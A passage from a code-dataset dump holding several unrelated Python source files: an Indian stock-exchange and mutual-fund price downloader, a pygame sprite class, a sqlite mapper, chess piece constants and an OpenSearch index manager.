Exception occurred: ', error.value)\n\t\t\t\tsys.exit()\n\t\t\telse:\n\t\t\t\tif not sourcedf.empty:\n\t\t\t\t\tsourcedf=sourcedf.groupby(groupby)\n\t\t\t\t\tfor key in sourcedf.groups:\n\t\t\t\t\t\tsourcedf.get_group(key).to_excel(xlwriter, key)\n\t\t\t\t\txlwriter.save()\n\t\t\t\t\tprint(\"{} has been created successfully...\".format(storein))\n\t\t\t\telse:\n\t\t\t\t\treturn []\n\n\n\t\tif groupby:\n\t\t\treturn sourcedf.groups\n\t\treturn []\n\n\tdef update_log(self,log_string=''):\n\t\tlogfile = self.settings['path']['raw'] + self.settings['log']\n\t\twith open(logfile,'a+') as fp:\n\t\t\tfp.write('{}\\t{}\\n'.format(dt.now().strftime('%m%d%Y %H:%M:%S'),self.url))\n\t\t\t\n\tdef clrDF(self):\n\t\tif not self.main_df.empty:\n\t\t\tdel self.main_df\n\t\t\tgc.collect()\n\t\t\tself.main_df = pd.DataFrame()\n\t\t\t\n\tdef UnZipBB(self,edate):\n\t\t#UnZip Bse Bond\n\t\tbdf = pd.DataFrame()\n\t\tr = self.request_url(self.url,True)\n\t\tif r.ok :\n\t\t\tzip_ref = zipfile.ZipFile(io.BytesIO(r.content))\n\t\t\tfor zipinfo in zip_ref.infolist():\n\t\t\t\tflName = zipinfo.filename\n\t\t\t\tdf = pd.read_csv(zip_ref.open(flName)).dropna(axis='columns', how = \"all\")\n\t\t\t\tif flName[:3] == \"wdm\":\n\t\t\t\t\tdf = df.rename(columns ={\"Scrip Code\": \"Security_cd\",\n\t\t\t\t\t\t\t\t\t\t\t\t\"Close Price\": \"LTP\"})\n\t\t\t\t\tdf['ISIN No.'] = df.apply(lambda row: row.Security_cd , axis = 1)\n\t\t\t\telif flName[:4] == \"icdm\":\n\t\t\t\t\tdf = df.rename(columns ={\"Security Code\":\"Security_cd\", \n\t\t\t\t\t\t\t\t\t\t\t\"Face Value\": \"FACE VALUE\"})\n\t\t\t\telif flName[:6] == \"fgroup\":\n\t\t\t\t\tdf['LTP'] = df.apply(lambda row: (row['Close Price']/row['FACE VALUE'])*100 , axis = 1)\n\t\t\t\t\t\n\t\t\t\tdf['TRADING_DATE'] = edate.strftime('%d-%b-%Y')\n\t\t\t\tbdf = bdf.append(df,sort=False)\n\t\t\tzip_ref.close()\n\t\t\treturn bdf\n\t\telse :\n\t\t\tprint (\"Unable to unzip the Http response {}\".format(self.url))\n\t\n\tdef Unzip(self,flName):\n\t\tr = self.request_url(self.url,True)\n\t\tif r.ok :\n\t\t\tzip_ref = zipfile.ZipFile(io.BytesIO(r.content))\n\t\t\tdf = 
pd.read_csv(zip_ref.open(flName)).dropna(axis='columns', how = \"all\")\n\t\t\tzip_ref.close()\n\t\t\treturn df\n\t\telse :\n\t\t\tprint (\"Unable to unzip the Http response {}\".format(self.url))\n\t\t\n\tdef NseF(self,edate):\n\t\turl = \"https://archives.nseindia.com/content/historical/DERIVATIVES/{}/{}/{}.zip\";\n\t\tmon = edate.strftime(\"%^b\")\n\t\tflName = \"fo{}{}{}bhav.csv\".format(edate.strftime(\"%d\"),mon,edate.year);\n\t\tself.url = url.format(edate.year,mon,flName)\n\t\tdframe = self.Unzip(flName)\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\n\tdef NseB(self,edate):\n\t\tself.url = \"https://archives.nseindia.com/archives/debt/cbm/cbm_trd{}.csv\".format(edate.strftime(\"%Y%m%d\"))\n\t\tdframe = pd.read_csv(io.StringIO(self.request_url(\n\t\t\tself.url).decode('utf-8')), delimiter=' *, *', engine='python', keep_default_na=False, dtype=str)\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\n\tdef BseB(self,edate):\n\t\tself.url = \"https://www.bseindia.com/download/Bhavcopy/Debt/DEBTBHAVCOPY{}.zip\".format(edate.strftime(\"%d%m%Y\"))\n\t\tdframe = self.UnZipBB(edate)\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\n\tdef BseE(self,edate):\n\t\tisin = dt.strptime(\"12312016\",'%m%d%Y')\n\t\turl = \"https://www.bseindia.com/download/BhavCopy/Equity/EQ\"\n\t\tflNme = \"EQ\"\n\t\tpdate = edate.strftime('%d%m%-y')\n\t\tif edate >= isin :\n\t\t\tflNme += \"_ISINCODE_\" + pdate + \".CSV\"\n\t\t\tself.url = url + \"_ISINCODE_\" + pdate + \".zip\"\n\t\t\tdframe = self.Unzip(flNme)\n\t\telse :\n\t\t\tflNme += pdate + \".CSV\"\n\t\t\tself.url = url + pdate + \"_CSV.zip\"\n\t\t\tdframe = self.Unzip(flNme)\n\t\t\t#The below columns available when you download the file using ISIN code\n\t\t\tdframe['ISIN_CODE'] = dframe.apply(lambda row: row.SC_CODE , axis = 1)\n\t\t\t\n\t\t\n\t\t# if 'TRADING_DATE' not in dframe.columns:\n\t\tdframe['TRADING_DATE'] = edate.strftime('%d-%b-%Y')\n\t\t\t\n\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\n\t\t\n\tdef DPrice(self,edate):\n\t\tif not edate:\n\t\t\tprint(\"Enter date you would like to download the price.\")\n\t\t\tsys.exit(0)\n\t\ttry:\n\t\t\tif self.callPriFunc == \"BE\":\n\t\t\t\tself.BseE(edate)\n\t\t\telif self.callPriFunc == \"BB\":\n\t\t\t\tself.BseB(edate)\n\t\t\telif self.callPriFunc == \"NB\":\n\t\t\t\tself.NseB(edate)\n\t\t\telif self.callPriFunc == \"NF\":\n\t\t\t\tself.NseF(edate)\n\t\texcept:\n\t\t\tprint(\"Fail to Download {}\".format(self.url))\n\t\n\tdef DHistPrice(self,edate,fdate):\n\t\tif not edate and not fdate:\n\t\t\tprint(\"Enter one date you would like to download the price.\")\n\t\t\tsys.exit(0)\n\t\t\n\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\tfdate = dt.strptime(fdate, '%m%d%Y')\n\t\tinc = timedelta(1)\n\t\twhile edate <= fdate :\n\t\t\tself.DPrice(edate)\n\t\t\tedate += inc\n# child class\n\n\nclass PpBse(PpSecurity):\n\tdef __init__(self, edate=\"\"):\n\t\tself.exchange=\"bse\"\n\t\tself.settings=pp_settings()[self.exchange]\n\t\t\n\tdef suck_E(self, edate, fdate=\"\"):\n\t\tprint(\"Download Prices For Equities\")\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'BE'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\tdef suck_B(self,edate,fdate=\"\"):\n\t\tprint(\"Download Historical Prices For Bonds\")\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'BB'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, 
'%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\t\tbondSett = self.settings[\"saveBy\"][\"BO\"]\n\t\tself.settings[\"ppformat\"] = bondSett[\"ppformat\"];\n\t\n\tdef cpyPri(self,fdate,tdate):\n\t\tself.copy_price(fdate,tdate)\n\t\tself.copy_price(fdate,tdate,\"bond/\")\n\n# child class\nclass PpAmfi(PpSecurity):\n\n\tdelim=';'\t\t\t# by default delim is ';'\n\n\t# def __init__(self):\n\t# self.exchange = \"amfi\"\n\t# self.settings = ppsettings()[self.exchange]\n\n\tdef __init__(self, edate=\"\", fdate=\"\"):\n\t\tself.exchange=\"amfi\"\n\n\t\tif not edate and not fdate:\n\t\t\tself.settings=pp_settings()[self.exchange]\n\t\telse:\n\t\t\tif fdate:\n\t\t\t\tsuper().__init__(edate, fdate)\n\t\t\telse:\n\t\t\t\tsuper().__init__(edate)\n\n\tdef suck(self):\n\t\t# print(\"downloading prices from \" + self.url + \"....\")\n\t\tself.__soup=bs(self.request_url(self.url).decode('utf-8'), \"lxml\")\n\t\tself.rowsep=\"\\r\\n\"\n\t\tcore_path = self.settings['path']['raw'] + 'core/' + dt.now().strftime(\"%m%d%Y_%H:%M:%S\")+\".txt\"\n\t\twith open(core_path,'w+') as fp:\n\t\t\tfp.write(self.__soup.text)\n\n\t\t# self.__soup = bs(self.requesturl(\"\").decode('utf-8'),\"lxml\")\n\n\tdef read(self, path):\n\t\ttry:\n\t\t\tf=open(path, \"r\")\n\t\texcept IOError:\n\t\t\tprint(\"Could not read file:\", path)\n\t\t\tsys.exit()\n\t\twith f:\n\t\t\tself.__soup=bs(f.read(), \"lxml\")\n\t\t\tself.rowsep=\"\\n\"\n\n\tdef parse(self):\n\n\t\tprint(\"Parsing prices ....\")\n\t\tself.delim=self.settings[\"delim\"]\n\t\tscheme_type=\"\"\n\t\tscheme_category=\"\"\n\t\tscheme_house=\"\"\n\t\tscheme_type_list=[\"Open\", \"Close\", \"Interval\"]\n\t\tdtable=[]\n\t\tif self.__soup.text:\n\n\t\t\tallLines=self.__soup.text.split(self.rowsep)\n\n\t\t\t# set column from the source data\n\t\t\tif self.delim in allLines[0]:\n\t\t\t\tself.columns=[column.strip()\n\t\t\t\t\t\t\t\tfor column in allLines[0].split(self.delim)]\n\n\t\t\t# print(self.columns)\n\n\t\t\t# parse data lines one by one\n\t\t\tfor line in allLines[1:]:\n\t\t\t\tif line.strip():\t\t\t\t\t\t\t\t# check if line is empty\n\t\t\t\t\tif self.delim in line:\t\t\t\t\t\t\t# checking the line is data row\n\t\t\t\t\t\t# Split data line into a list by delim\n\t\t\t\t\t\trow=line.split(self.delim)\n\t\t\t\t\t\trow.append(scheme_type)\n\t\t\t\t\t\trow.append(scheme_category)\n\t\t\t\t\t\trow.append(scheme_house)\n\t\t\t\t\t\tif len(row) == 10:\n\t\t\t\t\t\t\tprint(line)\n\t\t\t\t\t\tdtable.append(row)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# checking the line is Scheme Type and Scheme category\n\t\t\t\t\t\tif '(' in line and ')' in line and any(stype in line for stype in scheme_type_list):\n\t\t\t\t\t\t\tscheme_type=line.split('(', 1)[0].strip()\n\t\t\t\t\t\t\tscheme_category=line.split(\n\t\t\t\t\t\t\t\t'(', 1)[1].split(')')[0].strip()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tscheme_house=line\n\n\t\t\t# Extend columns for 3 extra columns\n\t\t\tself.columns.extend(self.settings[\"extend\"])\n\n\t\t\t# print(dtable)\n\t\t\t# print(self.columns)\n\t\t\t\n\t\t\t# Make dataframe on parsing mode\n\t\t\tself.main_df=pd.DataFrame(dtable, columns=self.columns)\n\t\t\tdup_rows = []\n\t\t\tself.main_df = self.main_df.rename(columns={\"ISIN Div Payout/ISIN Growth\": \"ISIN\"})\n\t\t\tfor index,row in self.main_df.iterrows():\n\t\t\t\tif row['ISIN'].strip() == '-' or row['ISIN'].strip() == \"\" :\n\t\t\t\t\tif row['ISIN Div Reinvestment'].strip():\n\t\t\t\t\t\trow['ISIN'] = row['ISIN Div Reinvestment']\n\t\t\t\t\telse:\n\t\t\t\t\t\trow['ISIN'] = row['Scheme Code']\n\t\t\t\telif len(row['ISIN Div 
Reinvestment']) == 12:\n\t\t\t\t\tdupRow = row.copy()\n\t\t\t\t\tdupRow['ISIN'] = dupRow['ISIN Div Reinvestment']\n\t\t\t\t\tdup_rows.append(dupRow.values)\n\t\t\t\n\t\t\tself.main_df = self.main_df.append(pd.DataFrame(dup_rows, columns=self.main_df.columns))\t\t\t\t\t\t\t\t\t\n\t\t\tself.main_df['type'] = \"mf\"\n\t\t\tdel dup_rows\n\t\t\n\tdef cpyPri(self,fdate,tdate):\n\t\tself.copy_price(fdate,tdate)\n\t\t\n\tdef DLPrice(self):\n\t\ttry:\n\t\t\tself.suck()\n\t\t\tself.parse()\n\t\t\tself.save(isCopyRaw=True)\n\t\texcept:\n\t\t\tself.misspri.append(\"AMFI failed to download {}\".format(self.url))\n\t\t\t# print(\"Fail to download\")\n\nclass PpNse(PpSecurity):\n\n\tdef __init__(self, edate=\"\"):\n\t\tself.exchange=\"nse\"\n\t\t\n\t\tif not edate:\n\t\t\tself.settings=pp_settings()[self.exchange]\n\t\telse:\n\t\t\tsuper().__init__(edate)\n\n\tdef suck(self):\n\t\tself.main_df=pd.read_csv(io.StringIO(self.request_url(\n\t\t\tself.url).decode('utf-8')), delimiter=' *, *', engine='python', keep_default_na=False, dtype=str)\n\t\t# self.main_df = pd.read_csv('/home/bharath/Downloads/out.csv', sep=\",\")\n\t\t\n\tdef suck_EQ_Hist(self, edate, fdate):\n\t\tprint(\"Download Historical Prices For Equities\")\n\t\tif not edate and not fdate:\n\t\t\tprint(\"There must be From and To dates to download prices for a range.\")\n\t\t\tsys.exit(0)\n\t\t\t\n\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\tfdate = dt.strptime(fdate, '%m%d%Y')\n\t\t\n\t\t# Downloading a range of Historical Price\n\t\tfrom nsepy.history import get_price_list\n\t\tinc = timedelta(1)\n\t\t\n\t\tdframe = pd.DataFrame();\n\t\t\t\t\n\t\twhile edate <= fdate:\n\t\t\ttry:\n\t\t\t\tdframe = get_price_list(dt=edate)\n\t\t\t\tself.main_df = self.main_df.append(dframe,sort=False)\n\t\t\texcept:\n\t\t\t\tprint (\"Cannot download the price file for the date {}.\".format(edate))\n\t\t\t\tself.misspri.append(\"NSE EQ FRange {}\".format(edate))\n\t\t\tedate += inc\n\t\t\n\t\teqSett = self.settings[\"saveBy\"][\"EQ\"]\n\t\tself.settings[\"saveby\"] = eqSett[\"saveby\"];\n\t\tself.settings[\"ppformat\"] = eqSett[\"ppformat\"];\n\t\t# self.main_df=self.main_df.rename(columns = {'CLOSE':'CLOSE_PRICE'})\n\t\t\n\tdef suck_B(self,edate,fdate=\"\"):\n\t\tprint(\"Download Historical Prices For Bonds\")\n\t\tif not edate and not fdate:\n\t\t\tprint(\"There must be a date for which you wish to download prices.\")\n\t\t\tsys.exit(0)\n\t\t\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'NB'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\t\tif len(self.main_df.columns) > 2 :\n\t\t\tself.main_df.insert(2,\"SERIES\",\"BO\")\n\t\telse:\n\t\t\tprint(\"File Not Found\")\n\t\t\tself.main_df = pd.DataFrame();\n\t\t\t\t\n\t\tbondSett = self.settings[\"saveBy\"][\"BO\"]\n\t\tself.settings[\"saveby\"] = bondSett[\"saveby\"];\n\t\tself.settings[\"ppformat\"] = bondSett[\"ppformat\"];\n\t\t# self.settings['path'] = bondSett['path']\t\t\n\t\t\n\tdef suck_I(self,edate,fdate=\"\"):\n\t\tprint(\"Download Historical Prices For Future and Option\")\n\t\tself.clrDF()\n\t\tself.callPriFunc = 'NF'\n\t\tif fdate:\n\t\t\tself.DHistPrice(edate,fdate)\n\t\telse:\n\t\t\tedate = dt.strptime(edate, '%m%d%Y')\n\t\t\tself.DPrice(edate)\n\t\t\n\t\tif not self.main_df.empty:\n\t\t\t# self.main_df['SYMB'] = self.main_df.apply(lambda row: row.SYMBOL + dt.strptime(row.EXPIRY_DT,\"%d-%b-%Y\").strftime(\"%m%d%Y\") + str(row.STRIKE_PR), axis = 1)\n\t\t\tself.main_df['EXPIRY_DT'] = 
self.main_df.apply(lambda row: dt.strptime(row.EXPIRY_DT,\"%d-%b-%Y\").strftime(\"%m%d%Y\") , axis = 1)\n\t\t\n\t\toptSett = self.settings[\"saveBy\"][\"OP\"]\n\t\tself.settings[\"saveby\"] = optSett[\"saveby\"];\n\t\tself.settings[\"ppformat\"] = optSett[\"ppformat\"];\n\t\t\n\tdef update_holiday(self):\n\n\t\t# read holiday list from central repo\n\t\tholidaydf=pd.read_csv(self.settings[\"holiday-path\"], sep=\"\\t\")\n\t\tholidaydf['Date']=pd.to_datetime(\n\t\t\tholidaydf['Date'], format='%d-%b-%Y').dt.strftime('%m%d%Y')\n\n\t\t# read PP holiday schedule information to get exchange number\n\t\tholsc_obj=PpTable(\"holsched.inf\")\n\t\tholsc_df=holsc_obj.getdata()\n\t\tholsc_df.name=holsc_df.name.str.lower()\n\t\texchange_no=holsc_df.loc[holsc_df['name']\n\t\t\t\t\t\t\t\t == self.exchange].hshed.iloc[0]\n\n\t\t# load Prism Holiday Information\n\t\thol_obj=PpTable(\"holidayb.inf\")\n\t\thol_df=hol_obj.getdata()\n\n\t\thol_dict={}\n\t\tfor item in hol_obj.dfidx.fcode.values:\n\t\t\tif item == \"hdate\":\n\t\t\t\thol_dict[item]=holidaydf.Date\n\t\t\tif item == \"htype\":\n\t\t\t\thol_dict[item]=[1 for i in range(len(holidaydf))]\n\t\t\tif item == \"hshed\":\n\t\t\t\thol_dict[item]=[exchange_no for i in range(len(holidaydf))]\n\n\t\t# create new holiday dataframe from central data\n\t\tnew_holiday=pd.DataFrame(hol_dict)\n\n\t\thol_df=pd.concat(\n\t\t\t[hol_df.astype(str), new_holiday.astype(str)], ignore_index=True)\n\n\t\thol_df=hol_df.drop_duplicates()\n\n\t\thol_df.hdate=pd.to_datetime(hol_df.hdate, format=\"%m%d%Y\")\n\t\thol_df=hol_df.sort_values(\"hdate\")\n\t\thol_df.hdate=hol_df.hdate.dt.strftime(\"%m%d%Y\")\n\n\t\thol_obj.savedata(hol_df)\n\t\tprint(\"data has been updated into {}...\".format(hol_obj.tablePath))\n\t\t# return hol_df\n\n\tdef parse(self):\n\n\t\tprint(\"No parsing...\")\n\t\t\n\tdef cpyPri(self,fdate,tdate):\n\t\tself.copy_price(fdate,tdate)\n\t\tself.copy_price(fdate,tdate,\"bond/\")\n\t\tself.copy_price(fdate,tdate,\"option/\")\n","sub_path":"libs/ppsecurity.py","file_name":"ppsecurity.py","file_ext":"py","file_size_in_byte":21888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224803458","text":"import pygame\r\n\r\nfrom src.setting import *\r\n\r\n\r\nclass Monster(object):\r\n\r\n    def __init__(self, screen):\r\n        self.blood = 100\r\n        self.screen = screen\r\n\r\n        self.image = pygame.image.load('D:/ship.bmp')\r\n        self.rect = self.image.get_rect()\r\n        self.screen_rect = screen.get_rect()\r\n        # Center each new ship at the bottom of the screen\r\n        self.rect.centerx = self.screen_rect.centerx\r\n        self.rect.bottom = self.screen_rect.bottom\r\n        self.move_right = False\r\n        self.move_left = False\r\n        self.move_up = False\r\n        self.move_down = False\r\n        self.unit_distance = monster_speed\r\n\r\n        # Store the ship's center coordinate as a float in the attribute 'center'\r\n        self.center = float(self.rect.centerx)\r\n\r\n    def move(self):\r\n        self.rect.centery += self.unit_distance\r\n","sub_path":"src/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629582488","text":"from tries.mappers.i_mapper import *\n# Internal\nfrom tries.domain.pipe import Pipe\n# Python\nimport sqlite3\n\n\n@mapperFor(Pipe)\nclass PipeMapper(IMapper):\n\n    def find(self, primaryKey):\n\n        with sqlite3.connect('example.db') as databaseSession:\n\n            dataSets = databaseSession.execute(\"SELECT * FROM Pipes WHERE Id = ?\", (primaryKey, ))\n            return self.handleDataSets(dataSets)\n    \n\n    def handleDataSets(self, dataSets):\n\n        results = []\n\n        for dataSet in dataSets:\n
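            # added note (assumption, not in the original): the row's columns are consumed\n            # positionally below, so the SELECT must yield (Id, Start, Stop) in that order.\n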
iterator = iter(dataSet)\n\n session = Pipe()\n\n session.primaryKey = next(iterator)\n session.start = next(iterator)\n session.stop = next(iterator)\n\n session.pipes = PipeMapper.find()\n\n results.append(session)\n\n return results","sub_path":"tries/mappers/pipe_mapper.py","file_name":"pipe_mapper.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535301634","text":"class Pieces:\n XX = 7\n OO = 0\n WP = 1\n WR = 2\n WN = 3\n WB = 4\n WQ = 5\n WK = 6\n BP = -1\n BR = -2\n BN = -3\n BB = -4\n BQ = -5\n BK = -6\n\n\nqueen_rook_col = 2\nking_start_col = 6\nking_rook_col = 9\nking_start_pos = {False: (2, king_start_col), True: (9, king_start_col)}\nking_castled_kingside_pos = {False: (2, 8), True: (9, 8)}\nking_castled_queenside_pos = {False: (2, 4), True: (9, 4)}\nrook_start_pos = {False: ((2, queen_rook_col), (2, king_rook_col)), True: ((9, queen_rook_col), (9, king_rook_col))}\n\npiece_to_descriptor = {'WP': (True, 'pawn'), 'WR': (True, 'rook'), 'WN': (True, 'knight'), 'WB': (True, 'bishop'), 'WQ': (True, 'queen'), 'WK': (True, 'king'), 'BP': (False, 'pawn'),\n 'BR': (False, 'rook'), 'BN': (False, 'knight'), 'BB': (False, 'bishop'), 'BQ': (False, 'queen'), 'BK': (False, 'king')}\n\nvalue_to_piece = {0: '0 ', 1: 'WP', 2: 'WR', 3: 'WN', 4: 'WB', 5: 'WQ', 6: 'WK', -1: 'BP', -2: 'BR', -3: 'BN', -4: 'BB', -5: 'BQ', -6: 'BK'}\n\npromotion_color_to_value = {('k', True): 6, ('q', True): 5, ('r', True): 2, ('b', True): 4, ('n', True): 3, ('p', True): 1, ('k', False): -6, ('q', False): -5, ('r', False): -2, ('b', False): -4,\n ('n', False): -3, ('p', False): -1}\n\nvalue_to_piece_short = {0: 'wtf', 1: 'p', 2: 'r', 3: 'n', 4: 'b', 5: 'q', 6: 'k', -1: 'p', -2: 'r', -3: 'n', -4: 'b', -5: 'q', -6: 'k'}\n\nvalue_to_piece_img = {-1: '♟', -2: '♜', -3: '♞', -4: '♝', -5: '♛', -6: '♚', 1: '♙', 2: '♖', 3: '♘', 4: '♗', 5: '♕', 6: '♔', 0: '.'}\n\npossible_promotions = {True: (2, 3, 4, 5), False: (-2, -3, -4, -5)}\n\nblack_walkable_squares = {1, 2, 3, 4, 5, 6, 0}\nwhite_piece_values = {1, 2, 3, 4, 5, 6}\nwhite_walkable_squares = {-1, -2, -3, -4, -5, -6, 0}\nblack_piece_values = {-1, -2, -3, -4, -5, -6}\n\nis_enemy = {True: lambda piece_int: piece_int in black_piece_values, False: lambda piece_int: piece_int in white_piece_values}\n\nrook_directions = ((0, 1), (1, 0), (0, -1), (-1, 0))\nbishop_directions = ((1, 1), (1, -1), (-1, -1), (-1, 1))\nqueen_directions = ((0, 1), (1, 0), (0, -1), (-1, 0), (1, 1), (1, -1), (-1, -1), (-1, 1))\n\n\ndef get_knight_squares(row, col):\n return ((row - 1, col + 2), (row + 1, col + 2), (row + 2, col + 1), (row + 2, col - 1), (row + 1, col - 2), (row - 1, col - 2), (row - 2, col - 1), (row - 2, col + 1))\n\n\ndef get_king_squares(row, col):\n return ((row + 1, col - 1), (row + 1, col), (row + 1, col + 1), (row, col - 1), (row, col + 1), (row - 1, col - 1), (row - 1, col), (row - 1, col + 1))\n\n\ndef get_attacking_enemy_pawn_squares(row, col, is_white):\n return [(row - 1, col - 1), (row - 1, col + 1)] if is_white else [(row + 1, col - 1), (row + 1, col + 1)]\n","sub_path":"Pieces.py","file_name":"Pieces.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"456216595","text":"# Copyright The IETF Trust 2022, All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy 
of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__author__ = 'Slavomir Mazur'\n__copyright__ = 'Copyright The IETF Trust 2022, All Rights Reserved'\n__license__ = 'Apache License, Version 2.0'\n__email__ = 'slavomir.mazur@pantheon.tech'\n\nimport json\nimport os\nimport typing as t\nfrom configparser import ConfigParser\n\nfrom opensearchpy import OpenSearch\nfrom opensearchpy.exceptions import AuthorizationException, NotFoundError, RequestError\nfrom opensearchpy.helpers import parallel_bulk\n\nimport utility.log as log\nfrom opensearch_indexing.models.keywords_names import KeywordsNames\nfrom opensearch_indexing.models.opensearch_indices import OpenSearchIndices\nfrom utility.create_config import create_config\n\n\nclass OpenSearchManager:\n def __init__(self, opensearch: t.Optional[OpenSearch] = None):\n config = create_config()\n self.threads = int(config.get('General-Section', 'threads'))\n log_directory = config.get('Directory-Section', 'logs')\n self.opensearch_repo_name = config.get('General-Section', 'opensearch-repo-name')\n self.opensearch_request_timeout = int(config.get('General-Section', 'opensearch-request-timeout', fallback=60))\n self._setup_opensearch(config, opensearch)\n log_file_path = os.path.join(log_directory, 'jobs', 'opensearch-manager.log')\n self.logger = log.get_logger('opensearch-manager', log_file_path)\n\n def _setup_opensearch(self, config: ConfigParser, opensearch: t.Optional[OpenSearch] = None):\n if opensearch:\n self.opensearch = opensearch\n return\n opensearch_aws = config.get('DB-Section', 'opensearch-aws')\n opensearch_credentials = config.get('Secrets-Section', 'opensearch-secret').strip('\"').split(' ')\n opensearch_host_config = {\n 'host': config.get('DB-Section', 'opensearch-host', fallback='localhost'),\n 'port': config.get('DB-Section', 'opensearch-port', fallback='9200'),\n }\n if opensearch_aws == 'True':\n self.opensearch = OpenSearch(\n hosts=[opensearch_host_config],\n http_auth=(opensearch_credentials[0], opensearch_credentials[1]),\n scheme='https',\n )\n return\n self.opensearch = OpenSearch(hosts=[opensearch_host_config])\n\n def ping(self) -> bool:\n return self.opensearch.ping()\n\n def cluster_health(self) -> dict:\n \"\"\"Returns a brief representation of the cluster health\"\"\"\n return self.opensearch.cluster.health()\n\n def create_index(self, index: OpenSearchIndices):\n \"\"\"\n Create OpenSearch index with given name.\n\n Argument:\n :param index (OpenSearchIndices) Index to be created\n \"\"\"\n index_name = index.value\n index_json_name = f'initialize_{index_name}_index.json'\n index_json_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/', index_json_name)\n with open(index_json_path, encoding='utf-8') as reader:\n index_config = json.load(reader)\n\n create_result = None\n try:\n create_result = self.opensearch.indices.create(index=index_name, body=index_config, ignore=400)\n except AuthorizationException:\n # https://discuss.elastic.co/t/forbidden-12-index-read-only-allow-delete-api/110282/4\n self.logger.exception('Problem with index creation')\n read_only_query = {'index': {'blocks': {'read_only_allow_delete': 'false'}}}\n 
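            # added note (not in the original): OpenSearch applies the read_only_allow_delete\n            # block automatically when disk watermarks are exceeded; clearing it here lets the\n            # retried create call succeed.\n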
self.opensearch.indices.put_settings(index=index_name, body=read_only_query)\n create_result = self.opensearch.indices.create(index=index_name, body=index_config, ignore=400)\n return create_result\n\n def index_exists(self, index: OpenSearchIndices) -> bool:\n \"\"\"\n Check if the index already exists.\n\n Argument:\n :param index (OpenSearchIndices) Index to be checked\n \"\"\"\n name = index.value\n return self.opensearch.indices.exists(name) or self.opensearch.indices.exists_alias(name)\n\n def get_indices(self) -> list:\n \"\"\"Returns a list of existing indices.\"\"\"\n return list(self.opensearch.indices.get_alias().keys())\n\n def put_index_mapping(self, index: OpenSearchIndices, body: dict) -> dict:\n \"\"\"\n Update mapping for provided index.\n\n Arguments:\n :param index (OpenSearchIndices) Index whose mapping to update\n :param body (dict) Mapping definition\n \"\"\"\n return self.opensearch.indices.put_mapping(index=index.value, body=body, ignore=403)\n\n def get_index_mapping(self, index: OpenSearchIndices) -> dict:\n \"\"\"\n Get mapping for provided index.\n\n Argument:\n :param index (OpenSearchIndices) Index whose mapping to get\n \"\"\"\n mapping = {}\n try:\n mapping = self.opensearch.indices.get_mapping(index=index.value)\n except NotFoundError:\n self.logger.exception('Index not found')\n return mapping\n\n def get_documents_count(self, index: OpenSearchIndices) -> int:\n \"\"\"\n Get number of documents stored in provided index.\n\n Argument:\n :param index (OpenSearchIndices) Index in which to search\n \"\"\"\n count = 0\n try:\n count = self.opensearch.count(index=index.value)['count']\n except NotFoundError:\n self.logger.exception('Index not found')\n return count\n\n def autocomplete(self, index: OpenSearchIndices, keyword: KeywordsNames, searched_term: str) -> list:\n \"\"\"\n Get list of the modules which will be returned as autocomplete after entering the 'searched_term' by the user.\n\n Arguments:\n :param index (OpenSearchIndices) Index in which to search\n :param keyword (KeywordsNames)\n :param searched_term (str) String entered by the user\n \"\"\"\n autocomplete_json_path = os.path.join(os.environ['BACKEND'], 'opensearch_indexing/json/completion.json')\n with open(autocomplete_json_path, encoding='utf-8') as reader:\n autocomplete_query = json.load(reader)\n\n autocomplete_query['query']['bool']['must'][0]['term'] = {keyword.value: searched_term.lower()}\n autocomplete_query['aggs']['groupby_module']['terms']['field'] = f'{keyword.value}.keyword'\n rows = self.opensearch.search(index=index.value, body=autocomplete_query)\n hits = rows['aggregations']['groupby_module']['buckets']\n\n result = [hit['key'] for hit in hits]\n\n return result\n\n def delete_from_index(self, index: OpenSearchIndices, module: dict) -> dict:\n \"\"\"\n Delete module from the index.\n\n Arguments:\n :param index (OpenSearchIndices) Target index from which to delete module\n :param module (dict) Document to delete\n \"\"\"\n self.logger.info(f'Deleting module: \"{module}\" from index: \"{index}\"')\n delete_module_query = self._get_name_revision_query(index, module)\n return self.opensearch.delete_by_query(index=index.value, body=delete_module_query, conflicts='proceed')\n\n def delete_from_indices(self, module: dict):\n for index in OpenSearchIndices:\n self.delete_from_index(index, module)\n\n def index_module(self, index: OpenSearchIndices, document: dict) -> dict:\n \"\"\"\n Creates or updates a 'document' in a selected index.\n\n Arguments:\n :param index 
